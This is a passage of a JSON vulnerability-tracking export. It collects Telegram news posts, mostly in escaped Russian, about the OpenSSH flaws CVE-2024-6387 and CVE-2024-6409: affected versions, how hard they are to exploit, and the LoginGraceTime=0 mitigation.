\u0432\u043d\u043e\u0432\u044c \u043f\u043e\u044f\u0432\u0438\u043b\u0430\u0441\u044c \u0432 \u043e\u043a\u0442\u044f\u0431\u0440\u0435 2020 \u0433\u043e\u0434\u0430 \u043a\u0430\u043a \u0447\u0430\u0441\u0442\u044c \u0432\u044b\u043f\u0443\u0441\u043a\u0430 OpenSSH 8.5p1. \n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0435\u0440\u0441\u0438\u0438 8.5p1-9.7p1, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0434\u043e 4.4p1 (\u0435\u0441\u043b\u0438 \u043e\u043d\u0438 \u043d\u0435 \u0438\u043c\u0435\u044e\u0442 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0439 \u0434\u043b\u044f CVE-2006-5051 \u0438\u00a0CVE-2008-4109). \n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c OpenBSD \u043d\u0435 \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043e\u043d\u0438 \u0438\u043c\u0435\u044e\u0442 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.\n\nQualys \u043f\u043e\u0434\u0435\u043b\u0438\u043b\u0430\u0441\u044c \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u043c\u0438 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u044f\u043c\u0438 regreSSHion, \u043d\u043e \u043d\u0435 \u043f\u0443\u0431\u043b\u0438\u043a\u0443\u0435\u0442 PoC \u0434\u043b\u044f \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438.\n\n\u0412\u043c\u0435\u0441\u0442\u043e \u044d\u0442\u043e\u0433\u043e, \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u0438\u043b\u0430 IoC \u0434\u043b\u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a.", "creation_timestamp": "2024-07-01T15:35:04.000000Z"}, {"uuid": "1577689f-9d31-4cc4-afc9-1fcbf3e91c66", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/true_secator/5950", "content": "\u041a \u043d\u0435\u0434\u0430\u0432\u043d\u0435\u0439 regreSSHion (CVE-2024-6387) \u043f\u0440\u0438\u0441\u043e\u0435\u0434\u0438\u043d\u044f\u0435\u0442\u0441\u044f \u043d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043f\u0430\u043a\u0435\u0442\u0430\u0445 OpenSSH, \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 Red Hat Enterprise Linux (RHEL) 9 \u0438 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 Fedora.\n\nCVE-2024-6409 \u0438\u043c\u0435\u0435\u0442 \u0441\u0445\u043e\u0434\u0441\u0442\u0432\u043e \u0441\u043e \u0441\u0432\u043e\u0435\u0439 \u043f\u0440\u0435\u0434\u0448\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u0438\u0446\u0435\u0439, \u043d\u043e \u0441\u0447\u0438\u0442\u0430\u0435\u0442\u0441\u044f \u043c\u0435\u043d\u0435\u0435 \u043e\u043f\u0430\u0441\u043d\u043e\u0439, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043f\u0440\u043e\u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u043e\u0441\u043b\u0435 \u0441\u0431\u0440\u043e\u0441\u0430 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 \u0434\u043e\u0447\u0435\u0440\u043d\u0435\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435, \u0438\u043d\u0438\u0446\u0438\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c SSH.\n\n\u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0432 \u043f\u0430\u043a\u0435\u0442\u0430\u0445 OpenSSH, \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u0445 \u0432 RHEL 9, \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043d\u0430 \u0432\u044b\u043f\u0443\u0441\u043a\u0435 OpenSSH 8.7.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0442\u0430\u043a\u0436\u0435 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 Fedora Linux 36 \u0438 37, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u044b \u043d\u0430 \u0432\u044b\u043f\u0443\u0441\u043a\u0430\u0445 OpenSSH 8.7 \u0438 8.8.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u0443\u0441\u043b\u043e\u0432\u043b\u0435\u043d\u0430 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435\u043c \u0433\u043e\u043d\u043a\u0438 \u0432 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0435 \u043f\u0440\u0435\u0440\u044b\u0432\u0430\u043d\u0438\u0439 SIGALRM, \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u043e\u0433\u043e \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u0439 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0435, \u043d\u043e \u043e\u0442\u043b\u0438\u0447\u0430\u0435\u0442\u0441\u044f \u0441\u0432\u043e\u0435\u0439 \u043f\u0440\u0438\u0447\u0438\u043d\u043e\u0439. \u041e\u043d\u043e \u0437\u0434\u0435\u0441\u044c \u0438\u043d\u0438\u0446\u0438\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0432\u044b\u0437\u043e\u0432\u043e\u043c cleanup_exit() \u0432 grace_alarm_handler() \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0435 \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432.\n\n\u0425\u043e\u0442\u044f\u00a0cleanup_exit() \u043c\u043e\u0436\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0432 \u0430\u0441\u0438\u043d\u0445\u0440\u043e\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u043e\u043c \u043a\u043e\u0434\u0435 \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u0439 \u043a\u043e\u0434\u043e\u0432\u043e\u0439 \u0431\u0430\u0437\u0435 OpenSSH, \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435, \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u043d\u043e\u0435 \u043a \u043f\u0430\u043a\u0435\u0442\u0430\u043c RHEL 9 \u0438 Fedora, \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u0435\u0442 \u0432\u044b\u0437\u043e\u0432 cleanup_exit() \u0434\u043b\u044f \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 \u0441\u043e\u0431\u044b\u0442\u0438\u0439 \u0430\u0443\u0434\u0438\u0442\u0430, \u0447\u0442\u043e \u043d\u0435\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e \u0434\u043b\u044f \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u0432.\n\n\u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e\u00a0\u0437\u0430\u044f\u0432\u043b\u0435\u043d\u0438\u044e\u00a0Solar Designer \u043d\u0430 Openwall, \u0433\u043b\u0430\u0432\u043d\u043e\u0435 \u043e\u0442\u043b\u0438\u0447\u0438\u0435 \u043e\u0442 CVE-2024-6387 \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435 \u0433\u043e\u043d\u043a\u0438 \u0438 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b RCE \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u044e\u0442\u0441\u044f \u0432 \u0434\u043e\u0447\u0435\u0440\u043d\u0435\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 privsep, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0441 \u043f\u043e\u043d\u0438\u0436\u0435\u043d\u043d\u044b\u043c\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438, \u0447\u0442\u043e \u0441\u043c\u044f\u0433\u0447\u0430\u0435\u0442 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 \u0443\u0449\u0435\u0440\u0431.\n\n\u041e\u0434\u043d\u0430\u043a\u043e \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c. \u0415\u0441\u043b\u0438 \u0442\u043e\u043b\u044c\u043a\u043e \u043e\u0434\u043d\u0430 \u0438\u0437 \u044d\u0442\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0431\u0443\u0434\u0435\u0442 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0438\u043b\u0438 \u0441\u043c\u044f\u0433\u0447\u0435\u043d\u0430, \u0434\u0440\u0443\u0433\u0430\u044f \u0441\u0442\u0430\u043d\u0435\u0442 \u0431\u043e\u043b\u0435\u0435 \u0437\u043d\u0430\u0447\u0438\u043c\u043e\u0439.\n\n\u041a\u0430\u043a \u043e\u0431\u044a\u044f\u0441\u043d\u044f\u0435\u0442 Designer, \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u044f\u0432\u0438\u0442\u044c\u0441\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u0443\u0434\u0435\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u043f\u0440\u043e\u0442\u0438\u0432 \u043b\u044e\u0431\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e\u0441\u0442\u043d\u043e, \u0447\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u0443\u043c\u0435\u043d\u044c\u0448\u0438\u0442\u044c \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c \u0430\u0442\u0430\u043a\u0438 \u0438\u043b\u0438 \u0443\u0432\u0435\u043b\u0438\u0447\u0438\u0442\u044c \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e\u0441\u0442\u044c \u0443\u0441\u043f\u0435\u0445\u0430.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0435 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0442\u0435\u043a\u0443\u0449\u0438\u0435 \u0432\u044b\u043f\u0443\u0441\u043a\u0438 Fedora, \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 Fedora 38, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0431\u043e\u043b\u0435\u0435 \u043d\u043e\u0432\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 OpenSSH \u0431\u0435\u0437 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u043d\u043e\u0433\u043e \u0432\u044b\u0437\u043e\u0432\u0430 cleanup_exit().\n\n\u041a \u0441\u043e\u0436\u0430\u043b\u0435\u043d\u0438\u044e, \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0439 \u043e\u0431\u0445\u043e\u0434\u043d\u043e\u0439 \u043f\u0443\u0442\u044c \u0434\u043b\u044f CVE-2024-6387, \u0432\u043a\u043b\u044e\u0447\u0430\u044e\u0449\u0438\u0439 \u043e\u043f\u0446\u0438\u044e -e \u0432 sshd \u0434\u043b\u044f \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0436\u0443\u0440\u043d\u0430\u043b\u0430 syslog, \u043d\u0435 \u0440\u0435\u0448\u0430\u0435\u0442 \u044d\u0442\u0443 \u043d\u043e\u0432\u0443\u044e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443.\n\n\u0412\u043c\u0435\u0441\u0442\u043e \u044d\u0442\u043e\u0433\u043e\u00a0\u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 LoginGraceTime=0 \u0432 sshd_config \u0434\u043b\u044f \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.", "creation_timestamp": "2024-07-09T17:35:05.000000Z"}, {"uuid": "6d906f60-78a0-4b28-acd9-674be5162de5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/true_secator/5928", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0438 \u043f\u0435\u0440\u0432\u044b\u0435 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 regreSSHion, \u043e\u0434\u043d\u0430\u043a\u043e \u043c\u0430\u0441\u0441\u043e\u0432\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u043c\u0430\u043b\u043e\u0432\u0435\u0440\u043e\u044f\u0442\u043d\u0430.\n\n\u041f\u0440\u0438\u0440\u0430\u0432\u043d\u0435\u043d\u043d\u0430\u044f \u043a Log4Shell \u043d\u043e\u0432\u0430\u044f CVE-2024-6387, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u0441\u043e\u0441\u0442\u043e\u044f\u043d\u0438\u0435\u043c \u0433\u043e\u043d\u043a\u0438 \u0432 OpenSSH, \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c\u0438 Qualys, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0441\u0440\u0430\u0437\u0443 \u0436\u0435 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0438 \u043e \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0435\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0435\u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u043c \u0434\u043b\u044f RCE \u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u043f\u043e\u043b\u043d\u043e\u043c\u0443 \u0437\u0430\u0445\u0432\u0430\u0442\u0443 \u0441\u0438\u0441\u0442\u0435\u043c\u044b.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u0442\u0430\u043a\u043e\u0435 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043e\u043d\u0430 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u0440\u0435\u0433\u0440\u0435\u0441\u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 OpenSSH, \u0432\u043f\u0435\u0440\u0432\u044b\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0439 \u0435\u0449\u0435 \u0432 2006 \u0433\u043e\u0434\u0443. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432\u043d\u043e\u0432\u044c \u0432\u043e\u0437\u043d\u0438\u043a\u043b\u0430 \u0432 2020 \u0433\u043e\u0434\u0443 \u0438 \u0431\u044b\u043b\u0430 \u043d\u0435\u043f\u0440\u0435\u0434\u043d\u0430\u043c\u0435\u0440\u0435\u043d\u043d\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0441 \u0432\u044b\u043f\u0443\u0441\u043a\u043e\u043c 9.8p1.\n\n\u041a \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u043c\u0443 \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u043e\u0431\u0441\u0443\u0436\u0434\u0430\u0435\u0442\u0441\u044f \u0432 \u0441\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u0435 \u0438 \u043d\u0435 \u0437\u0440\u044f, \u0432\u0435\u0434\u044c \u043f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Shodan \u0438 Censys \u0432 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0435 \u0431\u043e\u043b\u0435\u0435 14 \u043c\u0438\u043b\u043b\u0438\u043e\u043d\u043e\u0432 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u043e\u0432 OpenSSH.\n\nQualys \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u0438\u043b\u0430 \u043b\u0438\u0448\u044c \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438, \u043e\u0434\u043d\u0430\u043a\u043e \u043f\u043e\u0437\u0436\u0435 \u043f\u043e\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043b\u0438 PoC-\u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u044b. \u0414\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u043b\u0430\u0441\u044c \u0442\u043e\u043b\u044c\u043a\u043e \u0432 32-\u0440\u0430\u0437\u0440\u044f\u0434\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 Linux \u043d\u0430 \u0431\u0430\u0437\u0435 glibc. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u043d\u0430 64-\u0431\u0438\u0442\u043d\u044b\u0445 \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u0442\u0430\u043a\u0436\u0435 \u0441\u0447\u0438\u0442\u0430\u0435\u0442\u0441\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0439.\n\n\u0412 \u0441\u0432\u043e\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c, Palo Alto \u043f\u0440\u043e\u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u0447\u0430\u0441\u0442\u044c \u043a\u043e\u0434\u0430 PoC \u0438 \u043d\u0435 \u0441\u043c\u043e\u0433\u043b\u0430 \u0434\u043e\u0431\u0438\u0442\u044c\u0441\u044f RCE, \u043e\u0442\u043c\u0435\u0447\u0430\u044f \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435 \u043f\u0440\u0438\u0447\u0438\u043d \u0434\u043b\u044f \u043f\u0430\u043d\u0438\u043a\u0438. \u041d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0432\u0441\u044e \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u043e\u0441\u0442\u044c, \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430\u00a0\u0432\u0440\u044f\u0434 \u043b\u0438 \u043f\u0440\u0438\u0432\u0435\u0434\u0435\u0442 \u043a \u043c\u0430\u0441\u0441\u043e\u0432\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438.\n\n\u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f CVE-2024-6387 - \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u043d\u0435\u043f\u0440\u043e\u0441\u0442\u0430\u044f \u0437\u0430\u0434\u0430\u0447\u0430. Qualys\u00a0\u043f\u043e\u044f\u0441\u043d\u0438\u043b\u0430, \u0447\u0442\u043e \u0432 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u043e\u0432 \u043f\u043e\u0442\u0440\u0435\u0431\u043e\u0432\u0430\u043b\u043e\u0441\u044c \u043e\u043a\u043e\u043b\u043e 10\u00a0000 \u043f\u043e\u043f\u044b\u0442\u043e\u043a, \u0447\u0442\u043e\u0431\u044b \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u0442\u044c \u0443\u0441\u043b\u043e\u0432\u0438\u044f \u0433\u043e\u043d\u043a\u0438, \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u044b\u0435 \u0434\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438, \u0430 \u044d\u0442\u043e \u043e\u0442 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u0447\u0430\u0441\u043e\u0432 \u0434\u043e \u043d\u0435\u0434\u0435\u043b\u0438. \n\n\u0412 \u0441\u0432\u043e\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c, Dazz \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u043b\u0430\u0433\u0430\u044e\u0442, \u0447\u0442\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u0430 \u0432 \u043b\u0430\u0431\u043e\u0440\u0430\u0442\u043e\u0440\u043d\u044b\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445. \u042d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0441\u0442\u0430\u0442\u0438\u0441\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u043f\u043e \u0441\u0432\u043e\u0435\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435, \u043f\u043e\u043c\u0438\u043c\u043e \u044d\u0442\u043e\u0433\u043e \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u043c\u043d\u043e\u0433\u043e \u043f\u0440\u0435\u043f\u044f\u0442\u0441\u0442\u0432\u0438\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0443\u0436\u043d\u043e \u043f\u0440\u0435\u043e\u0434\u043e\u043b\u0435\u0442\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c.\n\n\u0421\u0430\u043c\u044b\u0439 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u0431\u043e\u043b\u0435\u0435 4 \u0447\u0430\u0441\u043e\u0432 \u0434\u043b\u044f \u0437\u0430\u043f\u0443\u0441\u043a\u0430, \u0432 \u043b\u0443\u0447\u0448\u0435\u043c \u0441\u043b\u0443\u0447\u0430\u0435. \u0422\u0435\u043c \u043d\u0435 \u043c\u0435\u043d\u0435\u0435, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0420\u0430\u0433\u0445\u0430\u0432 \u0420\u0430\u0441\u0442\u043e\u0433\u0438 \u0432\u0441\u0435 \u0436\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b IP-\u0430\u0434\u0440\u0435\u0441, \u0441 \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e, \u043f\u043e \u0432\u0441\u0435\u0439 \u0432\u0438\u0434\u0438\u043c\u043e\u0441\u0442\u0438,\u00a0\u0431\u044b\u043b\u0438 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f CVE-2024-6387.\n\n\u041f\u043e\u043c\u0438\u043c\u043e PoC \u0432 \u0441\u0435\u0442\u044c \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u044e\u0442 \u0438 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 OpenSSH.\n\n\u0411\u0443\u0434\u0435\u043c \u0441\u043b\u0435\u0434\u0438\u0442\u044c.", "creation_timestamp": "2024-07-03T14:20:01.000000Z"}, {"uuid": "f3cbd30a-fd2c-480f-a105-6fe4a075f0ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/linuxmalaysiamy/181", "content": "Critical OpenSSH Vulnerability (CVE-2024-6387): Please Update Your Linux\n\nA critical security flaw (CVE-2024-6387) has been identified in OpenSSH, a program widely used for secure remote connections. This vulnerability could allow attackers to completely compromise affected systems (remote code execution).\n\nWho is Affected?\n\nOnly specific versions of OpenSSH (8.5p1 to 9.7p1) running on 